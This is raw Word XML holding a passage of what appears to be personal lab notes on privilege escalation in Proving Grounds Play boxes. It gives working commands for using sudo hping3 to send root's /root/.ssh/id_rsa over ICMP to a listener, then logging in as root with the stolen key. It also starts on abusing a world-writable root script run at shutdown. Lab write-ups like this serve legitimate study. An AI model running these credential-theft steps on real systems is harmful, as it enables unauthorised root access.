    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId651">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ICMP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hping3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as root, but unlike the BBSCute box, we don't have SUID bit set for hping3. So, we can't do that simple attack vector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Instead, we can actually use the hping functionality. hping3 is a tool in kali linux, it does what ping does, plus it also has additional functionalities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F16">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using hping3, we can send contents of a file over ICMP in chunks, and have another ICMP listener going to catch the contents of the file. For this, we can try reading the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">private SSH key for root user. But theoretically, you can do this with any file too </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to reproduce:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, check to see if id_rsa is within /root/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la /root/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open a second terminal and ssh as Fox (compromised user), now we are running both sessions on same 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On your second terminal set up a listener session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo hping3 --icmp 127.0.0.1 --listen signature --safe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--listen signature</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : HPING3 listen mode, using this option hping3 waits for packet that contain signature and dump from signature end to packet's end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5321300" cy="990600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId652"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53213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1F20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now go to your first terminal where first established ssh session as fox is</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F21">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo /usr/sbin/hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F22">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--sign signature </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This is for packet identity,This is used to add a signature to the data payload of sent packets. This signature can be any arbitrary string of characters, and it will be included in the packet's data section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d : data size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1501825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="156" name="image162.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image162.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId653"/>
                    <a:srcRect b="65995" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1501825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go back to listener, where private key should be </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4567238" cy="1888377"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54" name="image54.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image54.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId654"/>
                    <a:srcRect b="60429" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4567238" cy="1888377"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now copy this id_rsa key and save it in your kali in a seperate new terminal, I have saved it as id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1428"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ssh -i id_rsa root@192.168.222.218</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F29">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F2D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wo3hlyd8scou" w:id="267"/>
      <w:bookmarkEnd w:id="267"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/sbin/shutdown</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/check-system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F2E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F2F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId655">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Tre</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we saw that we had sudo privileges for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/sbin/shutdown</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then we also noticed we had write privileges for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/check-system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (we found through LinPeas).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F30">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/check-system </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is not a standard Linux Binary, so it's likely a custom one. And based on the name, I'm guessing it's something that is automatically run every time we shutdown and restart the computer. If we run "ps" we can actually see that it's running right now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F32">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="791133"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="534" name="image527.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image527.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId656"/>
                    <a:srcRect b="54766" l="0" r="0" t="9452"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="791133"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F33">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F34">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Double checking the permissions, we see it is owned by root but we have the ability to read and write to it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="291"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tre@tre:/usr/bin$ ls -la check-system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="291"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rw----rw- 1 root root 135 May 12  2020 check-system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F38">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
